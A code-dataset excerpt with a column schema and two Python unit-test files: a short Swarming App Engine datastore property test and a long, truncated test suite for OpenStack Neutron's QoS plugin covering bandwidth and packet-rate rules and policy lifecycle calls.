hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b9edd7dbf25e820fdbc6faa76fd63ef5d9d3ec94 | 1,090 | py | Python | appengine/components/tests/datastore_utils_properties_test.py | pombreda/swarming | c70f311f3db8f25752c793a0d7b36cf537d95580 | [
"Apache-2.0"
] | null | null | null | appengine/components/tests/datastore_utils_properties_test.py | pombreda/swarming | c70f311f3db8f25752c793a0d7b36cf537d95580 | [
"Apache-2.0"
] | null | null | null | appengine/components/tests/datastore_utils_properties_test.py | pombreda/swarming | c70f311f3db8f25752c793a0d7b36cf537d95580 | [
"Apache-2.0"
] | 1 | 2021-12-06T03:37:36.000Z | 2021-12-06T03:37:36.000Z | #!/usr/bin/env python
# Copyright 2014 The Swarming Authors. All rights reserved.
# Use of this source code is governed by the Apache v2.0 license that can be
# found in the LICENSE file.
import sys
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components.datastore_utils import properties
from support import test_case
class BP(ndb.Model):
prop = properties.BytesComputedProperty(lambda _: '\x00')
class DJP(ndb.Model):
prop = properties.DeterministicJsonProperty(json_type=dict)
class PropertiesTest(test_case.TestCase):
def test_DeterministicJsonProperty(self):
self.assertEqual({'a': 1}, DJP(prop={'a': 1}).prop)
DJP(prop={'a': 1}).put()
self.assertEqual({'a': 1}, DJP.query().get().prop)
with self.assertRaises(TypeError):
DJP(prop=[])
def test_BytesComputedProperty(self):
self.assertEqual('\x00', BP().prop)
BP().put()
self.assertEqual('\x00', BP.query().get().prop)
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
| 23.695652 | 76 | 0.713761 | 596 | 0.546789 | 0 | 0 | 0 | 0 | 0 | 0 | 228 | 0.209174 |
b9ef242e4a5b9cd66209cacaae0f38bad7d2a39e | 128,492 | py | Python | neutron/tests/unit/services/qos/test_qos_plugin.py | dangervon/neutron | 06ce0c2c94d2256a8f6804a1eacb0733747dcf46 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/qos/test_qos_plugin.py | dangervon/neutron | 06ce0c2c94d2256a8f6804a1eacb0733747dcf46 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/qos/test_qos_plugin.py | dangervon/neutron | 06ce0c2c94d2256a8f6804a1eacb0733747dcf46 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from keystoneauth1 import exceptions as ks_exc
import netaddr
from neutron_lib.api.definitions import qos
from neutron_lib.callbacks import events
from neutron_lib import constants as lib_constants
from neutron_lib import context
from neutron_lib import exceptions as lib_exc
from neutron_lib.exceptions import placement as pl_exc
from neutron_lib.exceptions import qos as qos_exc
from neutron_lib.objects import utils as obj_utils
from neutron_lib.plugins import constants as plugins_constants
from neutron_lib.plugins import directory
from neutron_lib.services.qos import constants as qos_consts
from neutron_lib.utils import net as net_utils
import os_resource_classes as orc
from oslo_config import cfg
from oslo_utils import uuidutils
import webob.exc
from neutron.exceptions import qos as neutron_qos_exc
from neutron.extensions import qos_pps_minimum_rule_alias
from neutron.extensions import qos_rules_alias
from neutron import manager
from neutron.objects import network as network_object
from neutron.objects import ports as ports_object
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.services.qos import qos_plugin
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.services.qos import base
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
SERVICE_PLUGIN_KLASS = 'neutron.services.qos.qos_plugin.QoSPlugin'
class TestQosPlugin(base.BaseQosTestCase):
def setUp(self):
super(TestQosPlugin, self).setUp()
self.setup_coreplugin(load_plugins=False)
mock.patch('neutron.objects.db.api.create_object').start()
mock.patch('neutron.objects.db.api.update_object').start()
mock.patch('neutron.objects.db.api.delete_object').start()
mock.patch('neutron.objects.db.api.get_object').start()
_mock_qos_load_attr = mock.patch(
'neutron.objects.qos.policy.QosPolicy.obj_load_attr')
self.mock_qos_load_attr = _mock_qos_load_attr.start()
# We don't use real models as per mocks above. We also need to mock-out
# methods that work with real data types
mock.patch(
'neutron.objects.base.NeutronDbObject.modify_fields_from_db'
).start()
mock.patch.object(policy_object.QosPolicy, 'unset_default').start()
mock.patch.object(policy_object.QosPolicy, 'set_default').start()
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.admin_ctxt = context.get_admin_context()
self.policy_data = {
'policy': {'id': uuidutils.generate_uuid(),
'project_id': uuidutils.generate_uuid(),
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
self.rule_data = {
'bandwidth_limit_rule': {'id': uuidutils.generate_uuid(),
'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'id': uuidutils.generate_uuid(),
'dscp_mark': 16},
'minimum_bandwidth_rule': {
'id': uuidutils.generate_uuid(),
'min_kbps': 10},
'packet_rate_limit_rule': {
'id': uuidutils.generate_uuid(),
'max_kpps': 20,
'max_burst_kpps': 130},
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'any'},
}
self.policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
self.rule = rule_object.QosBandwidthLimitRule(
self.ctxt, **self.rule_data['bandwidth_limit_rule'])
self.dscp_rule = rule_object.QosDscpMarkingRule(
self.ctxt, **self.rule_data['dscp_marking_rule'])
self.min_bw_rule = rule_object.QosMinimumBandwidthRule(
self.ctxt, **self.rule_data['minimum_bandwidth_rule'])
self.pps_rule = rule_object.QosPacketRateLimitRule(
self.ctxt, **self.rule_data['packet_rate_limit_rule'])
self.min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **self.rule_data['minimum_packet_rate_rule'])
def _validate_driver_params(self, method_name, ctxt):
call_args = self.qos_plugin.driver_manager.call.call_args[0]
self.assertTrue(self.qos_plugin.driver_manager.call.called)
self.assertEqual(call_args[0], method_name)
self.assertEqual(call_args[1], ctxt)
self.assertIsInstance(call_args[2], policy_object.QosPolicy)
def _create_and_extend_port(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
has_qos_policy=True, has_net_qos_policy=False,
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
self.port_data = {
'port': {'id': uuidutils.generate_uuid(),
'network_id': network_id}
}
if has_qos_policy:
self.port_data['port']['qos_policy_id'] = self.policy.id
elif has_net_qos_policy:
self.port_data['port']['qos_network_policy_id'] = self.policy.id
self.port = ports_object.Port(
self.ctxt, **self.port_data['port'])
port_res = {"binding:vnic_type": "normal"}
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request(
port_res, self.port)
def _create_and_extend_ports(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
ports_res = [
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
]
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request_bulk(
ports_res, None)
def test__extend_port_resource_request_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_pps_rule(self):
port = self._create_and_extend_port([], [self.min_pps_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1']
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
port = self._create_and_extend_port(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_non_min_bw_or_min_pps_rule(self):
port = self._create_and_extend_port([], [])
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
physical_network=None)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_mix_rules_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
[self.min_pps_rule],
physical_network=None)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
ports = self._create_and_extend_ports([self.min_bw_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_pps_rule(self):
ports = self._create_and_extend_ports([], [self.min_pps_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1'] * 2
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
ports = self._create_and_extend_ports(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
for port in ports:
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_no_qos_policy(self):
port = self._create_and_extend_port([], physical_network='public',
has_qos_policy=False)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_inherited_policy(
self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_bw_rule.qos_policy_id = self.policy.id
port = self._create_and_extend_port([self.min_bw_rule],
has_net_qos_policy=True)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test_get_ports_with_policy(self):
network_ports = [
mock.MagicMock(qos_policy_id=None),
mock.MagicMock(qos_policy_id=uuidutils.generate_uuid()),
mock.MagicMock(qos_policy_id=None)
]
ports = [
mock.MagicMock(qos_policy_id=self.policy.id),
]
expected_network_ports = [
port for port in network_ports if port.qos_policy_id is None]
expected_ports = ports + expected_network_ports
with mock.patch(
'neutron.objects.ports.Port.get_objects',
side_effect=[network_ports, ports]
), mock.patch.object(
self.policy, "get_bound_networks"
), mock.patch.object(
self.policy, "get_bound_ports"
):
policy_ports = self.qos_plugin._get_ports_with_policy(
self.ctxt, self.policy)
self.assertEqual(
len(expected_ports), len(policy_ports))
for port in expected_ports:
self.assertIn(port, policy_ports)
def _test_validate_update_port_callback(self, policy_id=None,
original_policy_id=None):
port_id = uuidutils.generate_uuid()
kwargs = {
"port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock = mock.MagicMock(id=port_id, qos_policy_id=policy_id)
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_object',
return_value=port_mock
) as get_port, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_port"
) as validate_policy_for_port, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_port_callback(
"PORT", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['port'],
states=(kwargs['original_port'],)))
if policy_id is None or policy_id == original_policy_id:
get_port.assert_not_called()
get_policy.assert_not_called()
validate_policy_for_port.assert_not_called()
else:
get_port.assert_called_once_with(self.ctxt, id=port_id)
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
validate_policy_for_port.assert_called_once_with(
self.ctxt, policy_mock, port_mock)
def test_validate_update_port_callback_policy_changed(self):
self._test_validate_update_port_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_port_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_port_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_port_callback_policy_removed(self):
self._test_validate_update_port_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def _test_validate_update_network_callback(self, policy_id=None,
original_policy_id=None):
network_id = uuidutils.generate_uuid()
kwargs = {
"context": self.ctxt,
"network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_network": {
"id": network_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock_with_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(),
qos_policy_id=uuidutils.generate_uuid())
port_mock_without_own_policy = mock.MagicMock(
id=uuidutils.generate_uuid(), qos_policy_id=None)
ports = [port_mock_with_own_policy, port_mock_without_own_policy]
policy_mock = mock.MagicMock(id=policy_id)
admin_ctxt = mock.Mock()
with mock.patch(
'neutron.objects.ports.Port.get_objects',
return_value=ports
) as get_ports, mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy_mock
) as get_policy, mock.patch.object(
self.qos_plugin, "validate_policy_for_network"
) as validate_policy_for_network, mock.patch.object(
self.qos_plugin, "validate_policy_for_ports"
) as validate_policy_for_ports, mock.patch.object(
self.ctxt, "elevated", return_value=admin_ctxt
):
self.qos_plugin._validate_update_network_callback(
"NETWORK", "precommit_update", "test_plugin",
payload=events.DBEventPayload(
self.ctxt, desired_state=kwargs['network'],
states=(kwargs['original_network'],)))
if policy_id is None or policy_id == original_policy_id:
get_policy.assert_not_called()
validate_policy_for_network.assert_not_called()
get_ports.assert_not_called()
validate_policy_for_ports.assert_not_called()
else:
get_policy.assert_called_once_with(admin_ctxt, id=policy_id)
get_ports.assert_called_once_with(self.ctxt,
network_id=network_id)
validate_policy_for_ports.assert_called_once_with(
self.ctxt, policy_mock, [port_mock_without_own_policy])
def test_validate_update_network_callback_policy_changed(self):
self._test_validate_update_network_callback(
policy_id=uuidutils.generate_uuid())
def test_validate_update_network_callback_policy_not_changed(self):
policy_id = uuidutils.generate_uuid()
self._test_validate_update_network_callback(
policy_id=policy_id, original_policy_id=policy_id)
def test_validate_update_network_callback_policy_removed(self):
self._test_validate_update_network_callback(
policy_id=None, original_policy_id=uuidutils.generate_uuid())
def test_validate_policy_for_port_rule_not_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=False
):
self.policy.rules = [self.rule]
self.assertRaises(
qos_exc.QosRuleNotSupported,
self.qos_plugin.validate_policy_for_port,
self.ctxt, self.policy, port)
def test_validate_policy_for_port_all_rules_valid(self):
port = {'id': uuidutils.generate_uuid()}
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_port",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_port(
self.ctxt, self.policy, port)
except qos_exc.QosRuleNotSupported:
self.fail("QosRuleNotSupported exception unexpectedly raised")
def test_validate_policy_for_network(self):
network = uuidutils.generate_uuid()
with mock.patch.object(
self.qos_plugin.driver_manager, "validate_rule_for_network",
return_value=True
):
self.policy.rules = [self.rule]
try:
self.qos_plugin.validate_policy_for_network(
self.ctxt, self.policy, network_id=network)
except qos_exc.QosRuleNotSupportedByNetwork:
self.fail("QosRuleNotSupportedByNetwork "
"exception unexpectedly raised")
def test_create_min_bw_rule_on_bound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='compute:fake-zone')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
self.assertRaises(
NotImplementedError,
self.qos_plugin.create_policy_minimum_bandwidth_rule,
self.ctxt, policy.id, self.rule_data)
def test_create_min_bw_rule_on_unbound_port(self):
policy = self._get_policy()
policy.rules = [self.min_bw_rule]
segment = network_object.NetworkSegment(
physical_network='fake physnet')
net = network_object.Network(
self.ctxt,
segments=[segment])
port = ports_object.Port(
self.ctxt,
id=uuidutils.generate_uuid(),
network_id=uuidutils.generate_uuid(),
device_owner='')
with mock.patch(
'neutron.objects.qos.policy.QosPolicy.get_object',
return_value=policy), \
mock.patch(
'neutron.objects.network.Network.get_object',
return_value=net), \
mock.patch.object(
self.qos_plugin,
'_get_ports_with_policy',
return_value=[port]):
try:
self.qos_plugin.create_policy_minimum_bandwidth_rule(
self.ctxt, policy.id, self.rule_data)
except NotImplementedError:
self.fail()
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch('neutron.objects.qos.policy.QosPolicy')
def test_add_policy(self, mock_qos_policy, mock_create_rbac_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy, 'QosPolicy')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.create_policy(self.ctxt, self.policy_data)
policy_mock_call = mock.call.QosPolicy().create()
create_precommit_mock_call = mock.call.driver.call(
'create_policy_precommit', self.ctxt, mock.ANY)
create_mock_call = mock.call.driver.call(
'create_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_mock_call) <
mock_manager.mock_calls.index(create_precommit_mock_call) <
mock_manager.mock_calls.index(create_mock_call))
def test_add_policy_with_extra_tenant_keyword(self, *mocks):
policy_id = uuidutils.generate_uuid()
project_id = uuidutils.generate_uuid()
tenant_policy = {
'policy': {'id': policy_id,
'project_id': project_id,
'tenant_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
policy_details = {'id': policy_id,
'project_id': project_id,
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}
with mock.patch('neutron.objects.qos.policy.QosPolicy') as QosMocked:
self.qos_plugin.create_policy(self.ctxt, tenant_policy)
QosMocked.assert_called_once_with(self.ctxt, **policy_details)
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch(
'neutron.objects.rbac_db.RbacNeutronDbObjectMixin'
'.create_rbac_policy')
@mock.patch.object(policy_object.QosPolicy, 'update')
def test_update_policy(self, mock_qos_policy_update,
mock_create_rbac_policy, mock_qos_policy_get):
mock_qos_policy_get.return_value = self.policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_update, 'update')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
fields = obj_utils.get_updatable_fields(
policy_object.QosPolicy, self.policy_data['policy'])
self.qos_plugin.update_policy(
self.ctxt, self.policy.id, {'policy': fields})
self._validate_driver_params('update_policy', self.ctxt)
policy_update_mock_call = mock.call.update()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
'update_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_update_mock_call) <
mock_manager.mock_calls.index(update_precommit_mock_call) <
mock_manager.mock_calls.index(update_mock_call))
@mock.patch('neutron.objects.db.api.get_object', return_value=None)
@mock.patch.object(policy_object.QosPolicy, 'delete')
def test_delete_policy(self, mock_qos_policy_delete, mock_api_get_policy):
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_policy_delete, 'delete')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
self.qos_plugin.delete_policy(self.ctxt, self.policy.id)
self._validate_driver_params('delete_policy', self.ctxt)
policy_delete_mock_call = mock.call.delete()
delete_precommit_mock_call = mock.call.driver.call(
'delete_policy_precommit', self.ctxt, mock.ANY)
delete_mock_call = mock.call.driver.call(
'delete_policy', self.ctxt, mock.ANY)
self.assertTrue(
mock_manager.mock_calls.index(policy_delete_mock_call) <
mock_manager.mock_calls.index(delete_precommit_mock_call) <
mock_manager.mock_calls.index(delete_mock_call))
@mock.patch.object(policy_object.QosPolicy, "get_object")
@mock.patch.object(rule_object.QosBandwidthLimitRule, 'create')
def test_create_policy_rule(self, mock_qos_rule_create,
mock_qos_policy_get):
_policy = copy.copy(self.policy)
setattr(_policy, "rules", [])
mock_qos_policy_get.return_value = _policy
mock_manager = mock.Mock()
mock_manager.attach_mock(mock_qos_rule_create, 'create')
mock_manager.attach_mock(self.qos_plugin.driver_manager, 'driver')
mock_manager.reset_mock()
with mock.patch('neutron.objects.qos.qos_policy_validator'
'.check_bandwidth_rule_conflict',
return_value=None), \
mock.patch(
'neutron.objects.qos.qos_policy_validator'
'.check_min_pps_rule_conflict', return_value=None):
self.qos_plugin.create_policy_bandwidth_limit_rule(
self.ctxt, self.policy.id, self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
rule_create_mock_call = mock.call.create()
update_precommit_mock_call = mock.call.driver.call(
'update_policy_precommit', self.ctxt, mock.ANY)
update_mock_call = mock.call.driver.call(
